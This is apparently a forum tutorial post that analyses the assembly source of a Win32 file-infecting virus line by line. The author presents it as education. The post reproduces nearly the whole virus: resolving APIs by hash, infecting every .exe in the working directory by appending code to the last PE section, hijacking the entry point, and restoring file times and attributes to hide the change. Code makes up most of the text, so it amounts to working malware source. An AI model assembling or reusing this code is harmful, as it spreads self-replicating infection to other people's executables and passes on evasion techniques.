Continuing the discussion from Understanding a Win32 Virus: Background Material:
Code Analysis
Let’s begin with the first section of the code.
[BITS 32] ; defines 32-bit
%include "win32n.inc"
virStart:
pushad
call CodeStart
CodeStart:
pop ebp
sub ebp,CodeStart
The win32n.inc
simply defines a long list of structs which will be used later. A technique used here by calling CodeStart
and then pop
ing and then sub
ing itself from CodeStart
is called delta offset where by calling a routine directly in the address in front of itself, having it pop off the return address and then subtracting it from the address of the routine will result in the starting address of this code. This is especially important because since addresses are almost guaranteed to be different in each process’s memory space, it provides a means of creating a relative base offset to allow variables to be accessed without breaking anything.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Retrieve Kernel base ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx, [fs : 0x30] ; get a pointer to the PEB
mov ebx, [ebx + 0x0C] ; get PEB->Ldr
mov ebx, [ebx + 0x14] ; get PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry)
mov ebx, [ebx] ; 2nd Entry
mov ebx, [ebx] ; 3rd Entry
mov ebx, [ebx + 0x10] ; Get Kernel32 Base
mov [ebp+dwKernelBase] , ebx
This is pretty self-explanatory from the details in the background information section. If we look at the last line, we can see the variable dwKernelBase
being used through the offset of ebp
. Why ebp
? If you’ve forgotten already, look above this code extract. Please note that I’ve also listed the offsets for the structs, again, in the previous section.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Retrieve function addresses ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
sub esp , 68 ;save function addresses on the stack
mov ebx , esp
lea edi,[ebp+Kernel_APIs]
mov ecx,16
mov edx,[ebp+dwKernelBase]
push ebp
mov ebp , ebx
call RetrieveAPIs
Here, esp
is subtracted to hold the address of the functions as local variables. The RetrieveAPIs
function is documented such that the DLL base be in edx
, a pointer to a list of the required functions in edi
, the number of functions needed in ecx
and a pointer to the offset where the function address will be stored in ebp
. Note that since we have 16 functions, we require at least 16 * 4 bytes of data to store all the addresses, i.e. at least 64 bytes, the stack pointer esp
has been subtracted to at least this size. let’s take a quick look at the RetrieveAPIs
function before resuming this section of code.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; RetrieveAPIs ;
; Parameters : DLL base in edx , CRCs Offset in edi , No.of APIs in ecx , Offset to store at in ebp ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
RetrieveAPIs:
push ebx
push esi
mov esi, edx
add esi, [esi+0x3C] ; Start of PE header
mov esi, [esi+0x78] ; RVA of export dir
add esi, edx ; VA of export dir
push esi ; [esp] = VA of export dir
mov esi, [esi+0x20] ; RVA of ENT
add esi, edx ; VA of ENT
xor ebx,ebx
cld
looper:
inc ebx
lodsd
add eax , edx ;eax now points to the string of a function
call GenerateCRC ;eax now holds the hash of our function
cmp dword [edi] , eax
jne looper
mov eax,[esp]
mov eax,[eax+0x24] ;RVA of EOT
add eax,edx ;VA of EOT
movzx eax , word [(ebx-1)*2+eax] ;eax now holds the ordinal of our function
push esi
mov esi,[esp+4]
mov esi,[esi+0x1C] ;RVA of EAT
add esi,edx ;VA of EAT
mov esi,[eax*4+esi] ; use the ordinal * 4 to get the offset to the function address
add esi,edx
mov [ebp] , esi ;save address
pop esi
add edi,4
add ebp,4
dec ecx
jnz looper
pop esi
finished:
pop esi
pop ebx
ret
I’ve covered the necessary material at the end of the previous section. Essentially, what this piece of code does is it will iterate through the list of the kernel32
's function name list, convert the string with CRC and then compare it with the required functions (which have been initially parsed through CRC) in an alphabetical manner. If the two “hashes” match, it will obtain the function’s address by first getting the ordinal and then using it as an offset. It will then be stored on the stack and then ebp
will be incremented by 4 to point to the next location for the next function’s address. I won’t worry too much about the specifics of the instructions used but if you wish to know, please leave a comment below and I will explain it. Let’s continue the previous section of code.
pop ebp
lea edx,[ebp+szUser32] ; "user32.dll"
push edx
call [ebx+36] ; LoadLibrary
mov edx,eax
lea edi,[ebp+User_APIs]
xor ecx,ecx
inc ecx
push ebp
lea ebp , [ebx+64] ; save the function address on the stack here
call RetrieveAPIs ; get MessageBox function address
pop ebp
As we’ve seen in the analysis from the previous article, the payload is a MessageBox
but the function does not exist in kernel32
. Instead, it’s located in the user32
DLL. The virus needs to perform the same procedure as it did with kernel32
but this time, on user32
. Since the module is not loaded into the address space by default, it must dynamically perform it using the LoadLibrary
function first. Now that the virus has all of its required tools, let’'s finally analyze the viral routine.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Infection routine : Infect all files in the current directory ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
infectFirstFile:
sub esp,324
push esp
lea edx,[ebp+szExe] ; "*.exe"
push edx
call [ebx+16] ; FindFirstFile
inc eax
jz endInfection ; if (FindFirstFile(...) == INVALID_HANDLE_VALUE)
dec eax ; restore return value of FindFirstFile
mov dword [esp+320] , eax ;save search handle
infectNextFile:
call infectFile
push esp
push dword [esp+324]
call [ebx+20] ; FindNextFile
test eax,eax ; if (FindNextFile(...) != FALSE)
jnz infectNextFile ; loop
endInfection:
add esp,324
To infect a file, it must first find a file to infect. Using FindFirstFile with the file search to match *.exe
, it will provide a WIN32_FIND_DATA struct containing the information of the first found matching file in the working directory. If a file is found, it will call infectFile
and continue looping until all matching files are infected.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; infectFile routine ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
infectFile:
sub esp,48
push ebp
lea ebp,[esp+4]
mov edx , dword [ebp+52+WIN32_FIND_DATA.nFileSizeLow]
mov [ebp+0] , edx
mov [ebp+44] , edx
add dword [ebp+0] , virSize+1000h ;fileSize+virSize+extra work space
lea esi , [ebp+52+WIN32_FIND_DATA.cFileName]
push esi ; lpFileName
call [ebx+28] ;save original attributes; GetFileAttributes
mov [ebp+4] , eax
push dword 0x80 ; dwFileAttributes, FILE_ATTRIBUTE_NORMAL
push esi ; lpFileName
call [ebx+48] ;set to normal , ie clear all attributes: SetFileAttributes
Before attaching its own code onto the file, it will first save the original file attributes using GetFileAttributes and then set it’‘s file attributes to FILE_ATTRIBUTE_NORMAL
. I’'m assuming that the author decided to do this to make sure it had the correct permissions to write to the file in the circumstance that it was read-only.
xor edi,edi
push edi ; hTemplateFile, NULL
push edi ; dwFlagsAndAttributes, NULL
push 3 ; dwCreationDisposition, OPEN_EXISTING
push edi ; lpSecurityAttributes, NULL
push edi ; dwShareMode, 0
push 0xC0000000 ; dwDesiredAccess, GENERIC_READ | GENERIC_WRITE
push esi ; lpFileName, file to be infected
call [ebx+4] ; CreateFile
inc eax
jz done ; if (CreateFile(...) == INVALID_HANDLE_VALUE)
dec eax ; restore return value
mov dword [ebp+8] , eax ; save file handle on local stack
To infect the file, the handle to it must be obtained by using CreateFile using the GENERIC_READ | GENERIC_WRITE
access rights and opening an existing file with OPEN_EXISTING
.
lea edx , [ebp+12] ;
push edx ; lpLastWriteTime
add edx,8
push edx ; lpLastAccessTime
add edx,8
push edx ; lpCreationTime
push eax ; hFile
call [ebx+32] ; GetFileTime
I’'m assuming that the code here makes a call to GetFileTime to retrieve the pre-infected files times in an attempt to prevent any forensic evidence after modifying its contents.
push edi ; lpName, NULL
push dword [ebp+0] ; dwMaximumSizeLow
push edi ; dwMaximumSizeHigh, 0
push 4 ; flProtect, PAGE_READWRITE
push edi ; lpAttributes, NULL
push dword [ebp+8] ; hFile
call [ebx+8] ; CreateFileMapping
mov [ebp+36] , eax ; save handle to mapping on local stack
push dword [ebp] ; dwNumberOfBytesToMap, dwMaximumSizeLow
push edi ; dwFileOffsetLow, 0
push edi ; dwFileOffsetHigh, 0
push 2 ; dwDesiredAccess, FILE_MAP_WRITE(?)
push dword [ebp+36] ; hFileMappingObject
call [ebx+40] ; MapViewOfFile
mov esi,eax
mov edi,eax
mov [ebp+40] , eax ; save pointer to mapped file
Writing to an executable file is a bit more complex than simply appending to it. As the Windows loader sets up the executable into memory, it must rely on the data within the structures of the PE format to know what kind of data it is and how much data to write to memory. To achieve this, the host file must be mapped to the process’s address space for modification with read and write acces using CreateFileMapping and MapViewOfFile. If you’re having trouble with understanding this, just imagine that the host file has been read and then loaded into a buffer.
cmp word [esi] , 'MZ' ; 'MZ' e_magic
jne UnMap
cmp byte [esi+50h] , 't' ;already infected ?
je UnMap
mov byte [esi+50h] , 't' ;marked
add esi , [esi+0x3C] ; move offset of esi to point to PE header
cmp word [esi] , 'PE' ; 'PE' signature
jne UnMap
The next thing to do now is to check if the file is a proper PE file by checking the MZ
magic and the PE
signature. Here, the author has decided to tag an infected file using the letter t
at offset 0x50
from the beginning of the file. If the file is already infected or is not detected as a PE file, it will skip the infection process for optimization.
mov ecx , esi ;ecx points to start of pe header
movzx edx , word [esi+6] ;no. of sections
dec edx ; sections start with index 0
imul edx , 0x28 ; size of IMAGE_SECTION_HEADER
add esi , 0xF8 ; distance from PE header to first section header
add esi , edx ;esi points to header of the last section
add edi , [esi+14h] ; edi = PointerToRawData
add edi , [esi+8] ;start copying virus at offset : map + pointerToRawData + virtualSize
or dword [esi+0x24] , 00000020h | 20000000h | 80000000h | 80h ;set flags (writable , executable , etc)
For the viral code to be accessible by EIP
, the section it resides in must be executable. We can see that the virus does indeed just append to the end of the last section (as we assumed in the analysis demonstration). When it has reached the section header, it OR
s the Characteristics
member to include the executable flag IMAGE_SCN_MEM_EXECUTE
to grant the CPU access to execute the virus.
add dword [esi+8] , virSize ;increase virtual size
mov edx , dword [esi+8] ; edx = VirtualSize
mov dword [ecx+50h] , edx ; save VirtualSize to local stack
mov edx , [esi+0xC] ; edx = VirtualAddress
add dword [ecx+50h] , edx ; VirtualSize += VirtualAddress (RVA end of section data)
mov eax , dword [ecx+50h] ; eax = RVA end of section data
xor edx , edx
div dword [ecx+38h] ; eax /= SectionAlignment, edx = eax % SectionAlignment (remainder)
mov eax , [ecx+38h] ; eax = SectionAlignment
sub eax , edx ; SectionAlignment -= remainder
add dword [ecx+50h] , eax ;new aligned SizeOfImage
xor edx,edx
mov eax , dword [esi+8] ; eax = VirtualSize
div dword [ecx+3Ch] ; eax /= FileAlignment, edx = eax % FileAlignment (remainder)
mov eax , dword [ecx+3Ch] ; eax = FileAlignment
sub eax , edx ; eax -= remainder
push ecx ; preserve ecx
mov ecx, dword [esi+8] ; ecx = VirtualSize
mov dword [esi+10h] , ecx ; SizeOfRawData = VirtualSize
add dword [esi+10h] , eax ;new aligned SizeOfRawData += VirtualSize
mov ecx , dword [esi+10h] ; ecx = new SizeOfRawData
mov dword [ebp+44] , ecx ;save new file size for later call to SetFilePointer
mov ecx , dword [esi+14h] ; ecx = PointerToRawData
add dword [ebp+44] , ecx ; file size = SizeOfRawData + PointerToRawData
pop ecx ; restore ecx
Before adding the malicious code to the file, the program fixes the section header’s data accordingly by adding the size of itself and then realigning the section alignment and file alignment values. The author has chosen to save the new size (original size plus the malicious code) of the file for use later on.
mov eax , dword [esi+0xC] ; eax = VirtualAddress
add eax , dword [esi+8] ; eax += VirtualSize
mov edx , dword [ecx+28h] ;save OEP
add edx , dword [ecx+34h] ;Add Image base to OEP
sub eax , virSize ; eax -= virSize (start of virus code)
mov dword [ecx+28h] , eax ;set new entry point
mov esi , virStart ; esi = base of code
add esi , dword [esp] ; esi += offset to beginning of code
mov ecx , virSize ; number of bytes to copy
cld ; set forward direction for rep
rep movsb ;copy virus
sub edi , virSize-(backToHost-virStart)-1 ; OEP placeholder address
mov dword [edi] , edx ;patch OEP
In the first half of the code here, the OEP
(Original Entry Point) is calculated so that once the virus has finished execution, the infected program can continue its regular routine. To copy the virus code into the target file using rep movsb
, esi
is given the value of the beginning of the virus, edi
is given the location of where the data will be copied to and ecx
is given the size of the data to copy. Once the virus code has been copied, a placeholder for the OEP
will be overwritten with the actual OEP
.
UnMap:
push dword [ebp+44]
push dword [ebp+40]
call [ebx+24] ;FlushViewOfFile
push dword [ebp+40]
call [ebx+60] ;UnMapViewOfFile
push dword [ebp+36]
call [ebx] ;Close Map Handle
lea edx , [ebp+12]
push edx
add edx,8
push edx
add edx,8
push edx
push dword [ebp+8]
call [ebx+56] ;Restore original file time
push 0
push 0
push dword [ebp+44]
push dword [ebp+8]
call [ebx+52] ;SetFilePointer
push dword [ebp+8]
call [ebx+44] ;SetEndOfFile
push dword [ebp+8]
call [ebx] ;Close File Handle
done:
push dword [ebp+4]
lea edx , [ebp+52+WIN32_FIND_DATA.cFileName]
push edx
call [ebx+48] ;Restore original attributes
pop ebp
add esp,48
ret
I won’t bother going through this section of the code since it’s pretty self-explanatory. Essentially, it just cleans up handles and sets values back to the file, then returns.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Main Payload ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
push 0x10 ; uType; MB_ICONERROR
lea edx,[ebp+szTitle]
push edx ; lpCaption
lea edx,[ebp+szMsg]
push edx ; lpText
push 0 ; hWnd
call [ebx+64] ; MessageBox
cmp dword [ebp+backToHost+1] , 'SiGs' ;first generation ?
jne returnToHost
push 0 ; uExitCode; 0
call [ebx+12] ; ExitProcess
This is the payload of the virus, i.e. the message box.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Return to host ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
returnToHost:
add esp , 68
popad ; restore register values from before start of virus
backToHost:
push 'SiGs' ; push OEP
retn ; return to OEP
Again, this code section is self-explanatory.
Conclusion
This concludes the code analysis of the Win32 Virus. If there’s anything that I’ve missed, please notify me and I will try to correct is ASAP. Otherwise, thanks for reading and hope you’ve learned something valuable.
– dtm